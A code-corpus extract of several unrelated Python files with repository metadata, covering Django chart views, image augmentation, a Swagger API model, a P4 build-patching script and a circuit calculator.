msg = f'特雷森似乎没有叫"{name}"的人...\n角色别称补全计划:https://github.com/chieri-bot/umamusume-alias'
await matcher.send(Message(msg))
msg = f'您有{confi}%的可能在找{guess_name} {c.icon} {c.name}'
await matcher.send(Message(msg))
else:
msg = f'{c.name}{c.icon}'
await matcher.send(Message(msg), at_sender=True) | 32.19403 | 94 | 0.623551 | 0 | 0 | 0 | 0 | 1,809 | 0.788923 | 1,773 | 0.773223 | 584 | 0.254688 |
5f99e058ef025684556e0579c4ec1d81fb084ff1 | 8,288 | py | Python | analyzer/views.py | jonfang/CMPE295_DataAnalyzer | 6d74f55fa7e38ff8d25aecc388a5ed87c95037ae | [
"MIT"
] | 1 | 2020-10-12T18:17:05.000Z | 2020-10-12T18:17:05.000Z | analyzer/views.py | jonfang/CMPE295_DataAnalyzer | 6d74f55fa7e38ff8d25aecc388a5ed87c95037ae | [
"MIT"
] | 3 | 2019-11-19T20:41:50.000Z | 2021-06-10T21:48:44.000Z | analyzer/views.py | jonfang/CMPE295_DataAnalyzer | 6d74f55fa7e38ff8d25aecc388a5ed87c95037ae | [
"MIT"
] | 2 | 2019-10-30T23:18:57.000Z | 2019-11-23T00:23:17.000Z | from django.http import HttpResponse
from pyspark.sql import SparkSession
from django.shortcuts import render
from datetime import datetime
from core.chartfactory import createBarChart, createPieChart
from core.dataprocessor import DataProcessor
def sample(request):
"""
sample python report
"""
keys = ('Python', 'C++', 'Java', 'Perl', 'Scala', 'Lisp')
values = [10,8,6,4,2,1]
image_base64 = createBarChart(keys, values, 'Usage', 'Programming language usages')
return render(
request,
'analyzer/main.html',
{
'name': "Jon",
'date': datetime.now(),
'image_base64':image_base64,
}
)
def home(request):
return render(
request,
'analyzer/home.html',
)
def submit(request):
data = {}
if request.method == 'POST':
keys = []
values = []
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=7)
image_base64 = createBarChart(keys, values, 'Company', 'Average Empoyee Rating')
data = {
"title": request.POST.get("title", "defaultTitle"),
"description": request.POST.get("description", "defaultDescription"),
"news": request.POST.get("news", "defaultNews"),
"dataSet": request.POST.get("dataSet", "defaultDataset"),
"bar": request.POST.get("bar", "defaultBar"),
"pie": request.POST.get("pie", "defaultPie"),
"report1":image_base64
}
return render(
request,
'analyzer/new.html',
data
)
def case1(request):
keys = []
values = []
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=1)
image_base64 = createBarChart(keys, values, 'App Count', 'Google Play App Store Count By Category > 400 ')
keys.clear()
values.clear()
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=2)
config = {'rotation':90}
image_base64_1 = createBarChart(keys, values, 'App Count', 'Google Play App Store Count By Category < 400', configs=config)
return render(
request,
'analyzer/case1.html',
{
'report1':image_base64,
'report2':image_base64_1
}
)
def case2(request):
keys = []
values = []
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=5)
image_base64 = createPieChart(keys, values, 'India trade import 2010-2018')
keys.clear()
values.clear()
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=5)
config = {'rotation':90}
image_base64_1 = createBarChart(keys, values, 'Total(millions $USD)', 'India trade import 2010-2018', configs=config)
keys.clear()
values.clear()
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=6)
image_base64_2 = createPieChart(keys, values, 'India trade export 2010-2018')
keys.clear()
values.clear()
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=6)
config = {'rotation':90}
image_base64_3 = createBarChart(keys, values, 'Total(millions $USD)', 'India trade export 2010-2018', configs=config)
return render(
request,
'analyzer/case2.html',
{
'report5a':image_base64,
'report5b':image_base64_1,
'report6a':image_base64_2,
'report6b':image_base64_3,
}
)
def case3(request):
keys = []
values = []
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=4)
image_base64 = createPieChart(keys, values, 'Oakland Crime Rate 2011-2016')
keys.clear()
values.clear()
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=4)
config = {'rotation':90}
image_base64_1 = createBarChart(keys, values, 'Count', 'Oakland Crime Rate 2011-2016', configs=config)
return render(
request,
'analyzer/case3.html',
{
'report4a':image_base64,
'report4b':image_base64_1,
}
)
#google play app report 1
def report1(request):
keys = []
values = []
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=1)
image_base64 = createBarChart(keys, values, 'App Count', 'Google Play App Store Count By Category > 400')
return render(
request,
'analyzer/main.html',
{
'name': "Jon",
'date': datetime.now(),
'image_base64':image_base64,
}
)
#google play app report 2
def report2(request):
keys = []
values = []
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=2)
config = {'rotation':90}
image_base64 = createBarChart(keys, values, 'App Count', 'Google Play App Store Count By Category < 400', configs=config)
return render(
request,
'analyzer/main.html',
{
'name': "Jon",
'date': datetime.now(),
'image_base64':image_base64,
}
)
#google play app report 3
def report3(request):
keys = []
values = []
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=1)
image_base64 = createBarChart(keys, values, 'App Count', 'Google Play App Store Count By Category > 400 ')
keys.clear()
values.clear()
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=2)
config = {'rotation':90}
image_base64_1 = createBarChart(keys, values, 'App Count', 'Google Play App Store Count By Category < 400', configs=config)
return render(
request,
'analyzer/main1.html',
{
'name': "Jon",
'date': datetime.now(),
'image_base64':image_base64,
'image_base64_1':image_base64_1,
}
)
def report4(request):
keys = []
values = []
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=4)
image_base64 = createPieChart(keys, values, 'Oakland Crime Rate 2011-2016')
keys.clear()
values.clear()
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=4)
config = {'rotation':90}
image_base64_1 = createBarChart(keys, values, 'Count', 'Oakland Crime Rate 2011-2016', configs=config)
return render(
request,
'analyzer/main1.html',
{
'name': "Jon",
'date': datetime.now(),
'image_base64':image_base64,
'image_base64_1':image_base64_1,
}
)
def report5(request):
keys = []
values = []
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=5)
image_base64 = createPieChart(keys, values, 'India trade import 2010-2018')
keys.clear()
values.clear()
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=5)
config = {'rotation':90}
image_base64_1 = createBarChart(keys, values, 'Total(millions $USD)', 'India trade import 2010-2018', configs=config)
return render(
request,
'analyzer/main1.html',
{
'name': "Jon",
'date': datetime.now(),
'image_base64':image_base64,
'image_base64_1':image_base64_1,
}
)
def report6(request):
keys = []
values = []
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=6)
image_base64 = createPieChart(keys, values, 'India trade export 2010-2018')
keys.clear()
values.clear()
DataProcessor.getInstance().loadAndProcess(keys, values, report_type=6)
config = {'rotation':90}
image_base64_1 = createBarChart(keys, values, 'Total(millions $USD)', 'India trade export 2010-2018', configs=config)
return render(
request,
'analyzer/main1.html',
{
'name': "Jon",
'date': datetime.now(),
'image_base64':image_base64,
'image_base64_1':image_base64_1,
}
) | 35.418803 | 131 | 0.595077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,917 | 0.231298 |
5f9a0e11f9d9a926bf4cc162d77896b7f50869b6 | 4,668 | py | Python | utils/augment_data.py | caiobarrosv/object-detection-for-grasping | 2ac2f58700dff73032836ce33d3b98ebf3f29257 | [
"BSD-3-Clause"
] | null | null | null | utils/augment_data.py | caiobarrosv/object-detection-for-grasping | 2ac2f58700dff73032836ce33d3b98ebf3f29257 | [
"BSD-3-Clause"
] | 4 | 2020-07-24T19:31:51.000Z | 2022-03-12T00:41:28.000Z | utils/augment_data.py | caiobarrosv/object-detection-for-grasping | 2ac2f58700dff73032836ce33d3b98ebf3f29257 | [
"BSD-3-Clause"
] | null | null | null | from mxnet import nd
import os
import sys
sys.path.append(os.path.abspath(os.path.join(os.path.dirname( __file__ ), '..')))
import utils.common as dataset_commons
import cv2
import numpy as np
import glob
import pandas as pd
from gluoncv.data.transforms.presets.ssd import SSDDefaultTrainTransform
from matplotlib import pyplot as plt
'''
This code only gives you a tool to visualize
the images pointed in the csv file and the related bounding boxes using openCV
'''
data_common = dataset_commons.get_dataset_files()
# classes_keys = [key for key in data_common['classes']]
def apply_transformation(img_width, img_height, image, label):
if not isinstance(image, nd.NDArray):
image = nd.array(image)
if image.shape[0] == 3:
image = tensor_to_image(image)
image = nd.array(image)
label = np.array(label)
transform = SSDDefaultTrainTransform(img_width, img_height)
image, label = transform(image, label)
return image, label
def tensor_to_image(tensor):
image = tensor.asnumpy()*255
image = image.astype(np.uint8)
image = image.transpose((1, 2, 0)) # Move channel to the last dimension
return image
def save_image(image, images_path_save, new_images_name):
if not isinstance(image, np.ndarray):
image = tensor_to_image(image)
cv2.imwrite(images_path_save + '{0:04}'.format(new_images_name) + '.jpg', image)
def print_image(image, bbox, label):
if not isinstance(image, np.ndarray):
image = tensor_to_image(image)
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR) # OpenCV uses BGR orde
xmin = int(bbox[0][0])
ymin = int(bbox[0][1])
xmax = int(bbox[0][2])
ymax = int(bbox[0][3])
cv2.rectangle(image, (xmin, ymin), (xmax, ymax), (255, 0, 0), 1)
cv2.putText(image, 'label: ' + str(label), (xmin, ymin-10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 0))
cv2.imshow('img', image)
a = cv2.waitKey(0)
return a
def load_images_from_csv_and_augment(images_path, csv_path, images_path_save, img_width, img_height):
train_samples = pd.read_csv(csv_path)
csv_list = []
# numeração das novas imagens. As novas imagens terão novos nomes 0000.jpg, etc.
# para isso, será usado o num_new_images abaixo
new_images_name = 0
# number of new images generated from the original image
num_new_images = 4
csv_list = []
for i, row in train_samples.iterrows():
# Reading data from the csv file
image_name_with_extension = row['image']
label = row['label']
xmin = int(row['xmin'])
ymin = int(row['ymin'])
xmax = int(row['xmax'])
ymax = int(row['ymax'])
bbox = [[xmin, ymin, xmax, ymax]]
filename = glob.glob(images_path + "/" + image_name_with_extension)[0]
img = cv2.imread(filename)
for i in range(0, num_new_images+1): # +1 to account for the original image
value = ('{0:04}'.format(new_images_name) + '.jpg',
int(bbox[0][0]),
int(bbox[0][1]),
int(bbox[0][2]),
int(bbox[0][3]),
label
)
csv_list.append(value)
cv2.startWindowThread()
# a = print_image(img, bbox, label)
# if a == 27:
# break
# cv2.destroyWindow('img')
print('Saving image: ', '{0:04}'.format(new_images_name), '.jpg')
save_image(img, images_path_save, new_images_name)
img, bbox = apply_transformation(img_width, img_height, img, bbox)
new_images_name += 1
# if a == 27:
# break
column_name = ['image', 'xmin', 'ymin', 'xmax', 'ymax', 'label']
csv_converter = pd.DataFrame(csv_list, columns=column_name)
return csv_converter
if __name__ == "__main__":
source_images_path = data_common['image_folder']
source_csv_path = data_common['csv_path']
# TODO: Set the file save path
images_path_save = 'images_augmented/' # Folder that will contain the resized images
csv_path_save = 'images_augmented/csv/val_dataset.csv'
img_height = 300
img_width = 300
csv_converter = load_images_from_csv_and_augment(source_images_path, source_csv_path, images_path_save, img_width, img_height)
if not os.path.exists(images_path_save):
try:
os.makedirs(images_path_save + 'csv')
except OSError as e:
if e.errno != errno.EEXIST:
raise
csv_converter.to_csv(csv_path_save, index=None)
print('Successfully converted to a new csv file.')
| 33.826087 | 130 | 0.633248 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 989 | 0.211687 |
5f9a91b6b4cb83726c16979ae7cd27a95c8fd08d | 12,235 | py | Python | ultracart/models/apply_library_item_response.py | UltraCart/rest_api_v2_sdk_python | d734ea13fabc7a57872ff68bac06861edb8fd882 | [
"Apache-2.0"
] | 1 | 2018-03-15T16:56:23.000Z | 2018-03-15T16:56:23.000Z | ultracart/models/apply_library_item_response.py | UltraCart/rest_api_v2_sdk_python | d734ea13fabc7a57872ff68bac06861edb8fd882 | [
"Apache-2.0"
] | null | null | null | ultracart/models/apply_library_item_response.py | UltraCart/rest_api_v2_sdk_python | d734ea13fabc7a57872ff68bac06861edb8fd882 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
UltraCart Rest API V2
UltraCart REST API Version 2 # noqa: E501
OpenAPI spec version: 2.0.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class ApplyLibraryItemResponse(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'attributes': 'list[LibraryItemAttribute]',
'cjson': 'str',
'content_type': 'str',
'email_template_vm_path': 'str',
'error': 'Error',
'metadata': 'ResponseMetadata',
'storefront_oid': 'int',
'success': 'bool',
'title': 'str',
'uuid': 'str',
'warning': 'Warning'
}
attribute_map = {
'attributes': 'attributes',
'cjson': 'cjson',
'content_type': 'content_type',
'email_template_vm_path': 'email_template_vm_path',
'error': 'error',
'metadata': 'metadata',
'storefront_oid': 'storefront_oid',
'success': 'success',
'title': 'title',
'uuid': 'uuid',
'warning': 'warning'
}
def __init__(self, attributes=None, cjson=None, content_type=None, email_template_vm_path=None, error=None, metadata=None, storefront_oid=None, success=None, title=None, uuid=None, warning=None): # noqa: E501
"""ApplyLibraryItemResponse - a model defined in Swagger""" # noqa: E501
self._attributes = None
self._cjson = None
self._content_type = None
self._email_template_vm_path = None
self._error = None
self._metadata = None
self._storefront_oid = None
self._success = None
self._title = None
self._uuid = None
self._warning = None
self.discriminator = None
if attributes is not None:
self.attributes = attributes
if cjson is not None:
self.cjson = cjson
if content_type is not None:
self.content_type = content_type
if email_template_vm_path is not None:
self.email_template_vm_path = email_template_vm_path
if error is not None:
self.error = error
if metadata is not None:
self.metadata = metadata
if storefront_oid is not None:
self.storefront_oid = storefront_oid
if success is not None:
self.success = success
if title is not None:
self.title = title
if uuid is not None:
self.uuid = uuid
if warning is not None:
self.warning = warning
@property
def attributes(self):
"""Gets the attributes of this ApplyLibraryItemResponse. # noqa: E501
Attributes from the library item # noqa: E501
:return: The attributes of this ApplyLibraryItemResponse. # noqa: E501
:rtype: list[LibraryItemAttribute]
"""
return self._attributes
@attributes.setter
def attributes(self, attributes):
"""Sets the attributes of this ApplyLibraryItemResponse.
Attributes from the library item # noqa: E501
:param attributes: The attributes of this ApplyLibraryItemResponse. # noqa: E501
:type: list[LibraryItemAttribute]
"""
self._attributes = attributes
@property
def cjson(self):
"""Gets the cjson of this ApplyLibraryItemResponse. # noqa: E501
Cjson from library item, only populated if this library item was a cjson snippet or marketing email (not transactional) # noqa: E501
:return: The cjson of this ApplyLibraryItemResponse. # noqa: E501
:rtype: str
"""
return self._cjson
@cjson.setter
def cjson(self, cjson):
"""Sets the cjson of this ApplyLibraryItemResponse.
Cjson from library item, only populated if this library item was a cjson snippet or marketing email (not transactional) # noqa: E501
:param cjson: The cjson of this ApplyLibraryItemResponse. # noqa: E501
:type: str
"""
self._cjson = cjson
@property
def content_type(self):
"""Gets the content_type of this ApplyLibraryItemResponse. # noqa: E501
flow, campaign, cjson, upsell, transactional_email or email # noqa: E501
:return: The content_type of this ApplyLibraryItemResponse. # noqa: E501
:rtype: str
"""
return self._content_type
@content_type.setter
def content_type(self, content_type):
"""Sets the content_type of this ApplyLibraryItemResponse.
flow, campaign, cjson, upsell, transactional_email or email # noqa: E501
:param content_type: The content_type of this ApplyLibraryItemResponse. # noqa: E501
:type: str
"""
self._content_type = content_type
@property
def email_template_vm_path(self):
"""Gets the email_template_vm_path of this ApplyLibraryItemResponse. # noqa: E501
If a marketing email was applied, this is the path to the template encapsulating the cjson. This is needed for the UltraCart UI. # noqa: E501
:return: The email_template_vm_path of this ApplyLibraryItemResponse. # noqa: E501
:rtype: str
"""
return self._email_template_vm_path
@email_template_vm_path.setter
def email_template_vm_path(self, email_template_vm_path):
"""Sets the email_template_vm_path of this ApplyLibraryItemResponse.
If a marketing email was applied, this is the path to the template encapsulating the cjson. This is needed for the UltraCart UI. # noqa: E501
:param email_template_vm_path: The email_template_vm_path of this ApplyLibraryItemResponse. # noqa: E501
:type: str
"""
self._email_template_vm_path = email_template_vm_path
@property
def error(self):
"""Gets the error of this ApplyLibraryItemResponse. # noqa: E501
:return: The error of this ApplyLibraryItemResponse. # noqa: E501
:rtype: Error
"""
return self._error
@error.setter
def error(self, error):
"""Sets the error of this ApplyLibraryItemResponse.
:param error: The error of this ApplyLibraryItemResponse. # noqa: E501
:type: Error
"""
self._error = error
@property
def metadata(self):
"""Gets the metadata of this ApplyLibraryItemResponse. # noqa: E501
:return: The metadata of this ApplyLibraryItemResponse. # noqa: E501
:rtype: ResponseMetadata
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""Sets the metadata of this ApplyLibraryItemResponse.
:param metadata: The metadata of this ApplyLibraryItemResponse. # noqa: E501
:type: ResponseMetadata
"""
self._metadata = metadata
@property
def storefront_oid(self):
"""Gets the storefront_oid of this ApplyLibraryItemResponse. # noqa: E501
StoreFront oid where content originates necessary for tracking down relative assets # noqa: E501
:return: The storefront_oid of this ApplyLibraryItemResponse. # noqa: E501
:rtype: int
"""
return self._storefront_oid
@storefront_oid.setter
def storefront_oid(self, storefront_oid):
"""Sets the storefront_oid of this ApplyLibraryItemResponse.
StoreFront oid where content originates necessary for tracking down relative assets # noqa: E501
:param storefront_oid: The storefront_oid of this ApplyLibraryItemResponse. # noqa: E501
:type: int
"""
self._storefront_oid = storefront_oid
@property
def success(self):
"""Gets the success of this ApplyLibraryItemResponse. # noqa: E501
Indicates if API call was successful # noqa: E501
:return: The success of this ApplyLibraryItemResponse. # noqa: E501
:rtype: bool
"""
return self._success
@success.setter
def success(self, success):
"""Sets the success of this ApplyLibraryItemResponse.
Indicates if API call was successful # noqa: E501
:param success: The success of this ApplyLibraryItemResponse. # noqa: E501
:type: bool
"""
self._success = success
@property
def title(self):
"""Gets the title of this ApplyLibraryItemResponse. # noqa: E501
title of library item, usually the name of the flow or campaign, or description of cjson # noqa: E501
:return: The title of this ApplyLibraryItemResponse. # noqa: E501
:rtype: str
"""
return self._title
@title.setter
def title(self, title):
"""Sets the title of this ApplyLibraryItemResponse.
title of library item, usually the name of the flow or campaign, or description of cjson # noqa: E501
:param title: The title of this ApplyLibraryItemResponse. # noqa: E501
:type: str
"""
self._title = title
@property
def uuid(self):
"""Gets the uuid of this ApplyLibraryItemResponse. # noqa: E501
UUID of marketing email or communication flow/campaign if this library item was an email, campaign or flow # noqa: E501
:return: The uuid of this ApplyLibraryItemResponse. # noqa: E501
:rtype: str
"""
return self._uuid
@uuid.setter
def uuid(self, uuid):
"""Sets the uuid of this ApplyLibraryItemResponse.
UUID of marketing email or communication flow/campaign if this library item was an email, campaign or flow # noqa: E501
:param uuid: The uuid of this ApplyLibraryItemResponse. # noqa: E501
:type: str
"""
self._uuid = uuid
@property
def warning(self):
"""Gets the warning of this ApplyLibraryItemResponse. # noqa: E501
:return: The warning of this ApplyLibraryItemResponse. # noqa: E501
:rtype: Warning
"""
return self._warning
@warning.setter
def warning(self, warning):
"""Sets the warning of this ApplyLibraryItemResponse.
:param warning: The warning of this ApplyLibraryItemResponse. # noqa: E501
:type: Warning
"""
self._warning = warning
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ApplyLibraryItemResponse, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ApplyLibraryItemResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 31.211735 | 213 | 0.621087 | 11,944 | 0.976216 | 0 | 0 | 7,599 | 0.621087 | 0 | 0 | 7,116 | 0.58161 |
5f9b09cbcd120955bb173c4d9f5b1fd61f32f6e1 | 103 | py | Python | notebooks/python_recap/_solutions/python_rehearsal6.py | jonasvdd/DS-python-data-analysis | 835226f562ee0b0631d70e48a17c4526ff58a538 | [
"BSD-3-Clause"
] | 65 | 2017-03-21T09:15:40.000Z | 2022-02-01T23:43:08.000Z | notebooks/python_recap/_solutions/python_rehearsal6.py | jonasvdd/DS-python-data-analysis | 835226f562ee0b0631d70e48a17c4526ff58a538 | [
"BSD-3-Clause"
] | 100 | 2016-12-15T03:44:06.000Z | 2022-03-07T08:14:07.000Z | notebooks/python_recap/_solutions/python_rehearsal6.py | jonasvdd/DS-python-data-analysis | 835226f562ee0b0631d70e48a17c4526ff58a538 | [
"BSD-3-Clause"
] | 52 | 2016-12-19T07:48:52.000Z | 2022-02-19T17:53:48.000Z | np_pressures_hPa * math.exp(-gravit_acc * molar_mass_earth* height/(gas_constant*standard_temperature)) | 103 | 103 | 0.84466 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
5f9b8fe1beadc23d6a4c015ccb7948ee8af7a618 | 322 | py | Python | test/test_coverage.py | atupilojon/-resources--pytest | eae62b54828bb82dc534b37d9b46b83cb6d31c03 | [
"MIT"
] | null | null | null | test/test_coverage.py | atupilojon/-resources--pytest | eae62b54828bb82dc534b37d9b46b83cb6d31c03 | [
"MIT"
] | null | null | null | test/test_coverage.py | atupilojon/-resources--pytest | eae62b54828bb82dc534b37d9b46b83cb6d31c03 | [
"MIT"
] | null | null | null | from pytest import mark
# if setup.py present, code could be installed as library
# so that there's no need include path
# pip install -e .
from pytest_resources import do_lower_case
# from src.for_testing import do_lower_case
@mark.coverage
def check_lower_case():
assert do_lower_case('SomeThing') == 'something'
| 24.769231 | 57 | 0.773292 | 0 | 0 | 0 | 0 | 91 | 0.282609 | 0 | 0 | 178 | 0.552795 |
5f9c3b49af1837552a765743d83f19677ef7b0fe | 3,476 | py | Python | targets/simple_router/flow_radar_bm/change_bm.py | tsihang-zz/FlowRadar-P4 | 1b4f92b83257ba8f34475c098bce8b84daa35b7c | [
"Apache-2.0"
] | 15 | 2018-08-21T10:49:38.000Z | 2021-06-23T14:33:32.000Z | targets/simple_router/flow_radar_bm/change_bm.py | harvard-cns/FlowRadar-P4 | 1b4f92b83257ba8f34475c098bce8b84daa35b7c | [
"Apache-2.0"
] | 1 | 2017-10-16T07:49:06.000Z | 2017-10-16T13:45:36.000Z | targets/simple_router/flow_radar_bm/change_bm.py | USC-NSL/FlowRadar-P4 | 1b4f92b83257ba8f34475c098bce8b84daa35b7c | [
"Apache-2.0"
] | 6 | 2016-07-26T15:47:46.000Z | 2018-03-23T01:50:06.000Z | import re
import os
def changed(lines, token):
for line in lines:
if line.find(token) != -1:
return True
return False
# copy required files
def copy_files():
os.system("cp flow_radar.h ../build/bm/src")
# change actions.c to add flow_radar lock
def change_actions_c():
actions_c = open("../build/bm/src/actions.c","r")
lines = actions_c.readlines()
actions_c.close()
if changed(lines, '#include "flow_radar.h"'):
return
actions_c = open("../build/bm/src/actions.c","w")
lock_flag = 0
include_flag = 1
for line in lines:
if lock_flag == 1:
m = re.search("^}$", line)
if m != None:
actions_c.write(" unlock_flow_radar();\n")
lock_flag = 0
actions_c.write(line)
if include_flag == 1:
m = re.search("^\*/", line)
if m != None:
actions_c.write('#include "flow_radar.h"\n')
include_flag = 0
if line.find("void action_update_flow_radar") != -1:
actions_c.write(" lock_flow_radar();\n")
lock_flag = 1
actions_c.close()
# change p4_pd_rpc_server.ipp
def change_p4_pd_rpc_server_ipp():
file = open("../build/bm/src/p4_pd_rpc_server.ipp","r")
lines = file.readlines()
file.close()
if changed(lines, '#include "flow_radar.h"'):
return
file = open("../build/bm/src/p4_pd_rpc_server.ipp","w")
key_reg = ["flow_xor_srcip","flow_xor_dstip", "flow_xor_srcport", "flow_xor_dstport", "flow_xor_prot", "flow_count", "packet_count", "flow_filter"]
size = {}
field = ""
for line in lines:
for key in key_reg:
if line.find("void register_read_whole_%s"%key) != -1:
field = key
if field != "":
m = re.search("int8_t ret\[(.*)\];", line)
if m != None:
size[field] = m.group(1)
field = ""
total_size = "(%s)"%size[key_reg[0]]
for key in key_reg[1:]:
total_size += " + (%s)"%size[key]
file.write('extern "C" {\n')
file.write('#include "flow_radar.h"\n')
file.write('}\n')
for line in lines:
file.write(line)
if line.find("// REGISTERS") != -1:
file.write(" void dump_flow_radar(std::vector<int8_t> & _return, const SessionHandle_t sess_hdl, const DevTarget_t& dev_tgt) {\n")
file.write(" p4_pd_dev_target_t pd_dev_tgt;\n")
file.write(" pd_dev_tgt.device_id = dev_tgt.dev_id;\n")
file.write(" pd_dev_tgt.dev_pipe_id = dev_tgt.dev_pipe_id;\n")
file.write(" int8_t ret[%s];\n"%total_size)
file.write(" lock_flow_radar();\n")
ret = "ret"
for key in key_reg:
file.write(" p4_pd_simple_router_register_read_whole_%s(sess_hdl, pd_dev_tgt, %s);\n"%(key, ret))
file.write(" p4_pd_simple_router_register_clean_%s(sess_hdl, pd_dev_tgt);\n"%(key))
ret += " + (%s)"%size[key]
file.write(" unlock_flow_radar();\n")
file.write(" _return.resize(%s);\n"%total_size)
file.write(" for (int i = 0; i < _return.size(); i++)\n")
file.write(" _return[i] = ret[i];\n")
file.write(" }\n")
file.close()
def change_p4_pd_rpc_thrift():
file = open("../build/bm/thrift/p4_pd_rpc.thrift","r")
lines = file.readlines()
file.close()
if changed(lines, "list<byte> dump_flow_radar"):
return
file = open("../build/bm/thrift/p4_pd_rpc.thrift","w")
for line in lines:
file.write(line)
if line.find("# registers") != -1:
file.write(" list<byte> dump_flow_radar(1:res.SessionHandle_t sess_hdl,\n")
file.write(" 2:res.DevTarget_t dev_tgt);\n")
file.close()
if __name__ == "__main__":
copy_files()
change_actions_c()
change_p4_pd_rpc_server_ipp()
change_p4_pd_rpc_thrift()
| 31.035714 | 148 | 0.649597 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,553 | 0.446778 |
5f9c54619428b0b6d3296e3c0080e9ec17335d9c | 2,807 | py | Python | elecalc.py | shka86/py_calc | 780167bc10e2a74741ac9620dbc859c0d310e299 | [
"MIT"
] | null | null | null | elecalc.py | shka86/py_calc | 780167bc10e2a74741ac9620dbc859c0d310e299 | [
"MIT"
] | null | null | null | elecalc.py | shka86/py_calc | 780167bc10e2a74741ac9620dbc859c0d310e299 | [
"MIT"
] | null | null | null | #!/usr/bin/python3
# -*- coding: utf-8 -*-
# calculation tool for a bridge circuit with two input current sources
# two current sources can supply from both of top of the bridge and middle of the bridge
# define the voltage name as follows:
# Vp: voltage at the top of the bridge
# Vn: voltage at the middle of the bridge
def paraR(R1, R2):
return R1*R2/(R1+R2)
def unbalanced_bridge( I = 1, Ra = 1, Rb = 1, Rc = 1, Rd = 1, Re = 1, Rf = 1):
print("# --- calc unbalanced bridge ---------------")
# params
print("I=", I, "A")
print("Ra=", Ra, "ohm")
print("Rb=", Rb, "ohm")
print("Rc=", Rc, "ohm")
print("Rd=", Rd, "ohm")
print("Re=", Re, "ohm")
print("Rf=", Rf, "ohm")
# delta-Y transpose
denom = Ra + Rb + (Rc + Rd)
Ralpha = Ra * Rb / denom
Rbeta = (Rc + Rd) * Ra / denom
Rgamma = Rb * (Rc + Rd) / denom
print("denom=", denom, "ohm")
print("Ralpha=", Ralpha, "ohm")
print("Rbeta=", Rbeta, "ohm")
print("Rgamma=", Rgamma, "ohm")
# I sprit
Il = (Rgamma + Rf) / ((Rbeta + Re) + (Rgamma + Rf)) * I
Ir = (Rbeta + Re) / ((Rbeta + Re) + (Rgamma + Rf)) * I
print("Il=", Il, "A")
print("Ir=", Ir, "A")
# calc Vtop and Vmid
Vl = Re * Il
Vr = Rf * Ir
print("Vl=", Vl, "V")
print("Vr=", Vr, "V")
Vtop = (Ralpha + (paraR((Rbeta + Re), (Rgamma + Rf)))) * I
Vmid = (Rd * Vl + Rc * Vr) / (Rc + Rd)
print("Vtop=", Vtop, "V")
print("Vmid=", Vmid, "V")
return Vtop, Vmid
def main():
# current of two input sources
current1 = 2.5e-3
current2 = 1.25e-3
# unbaranced brigde params
# branch on input side
Ra = 100
Rb = 100
# bridge part (series resistor)
Rc = 100
Rd = 100
# branch on ground side
Re = 50
Rf = 50
current1 = 2
current2 = 1
Vtop1, Vmid1 = unbalanced_bridge(current1, Ra, Rb, Rc, Rd, Re, Rf)
Vtop2, Vmid2 = unbalanced_bridge(current2, Ra, Rb, Rc, Rd, Re, Rf)
print("# --- sum based on superposition theorem ---------------")
print("# when two current sources supply from top")
Vp = Vtop1 + Vtop2
Vn = Vmid1 + Vmid2
print("Vp=", Vp, "V")
print("Vn=", Vn, "V")
# same meaning
# unbalanced_bridge(current1+current2, Ra, Rb, Rc, Rd, Re, Rf)
print("# when current1 from the top, current2 from the middle")
Vp = Vtop1 + Vmid2
Vn = Vmid1 + Vtop2
print("Vp=", Vp, "V")
print("Vn=", Vn, "V")
print("# when current2 from the top, current1 from the middle")
Vp = Vmid1 + Vtop2
Vn = Vtop1 + Vmid2
print("Vp=", Vp, "V")
print("Vn=", Vn, "V")
print("# when two current sources from middle")
Vp = Vmid1 + Vmid2
Vn = Vtop1 + Vtop2
print("Vp=", Vp, "V")
print("Vn=", Vn, "V")
if __name__ == '__main__':
main()
| 25.990741 | 88 | 0.540791 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,126 | 0.40114 |
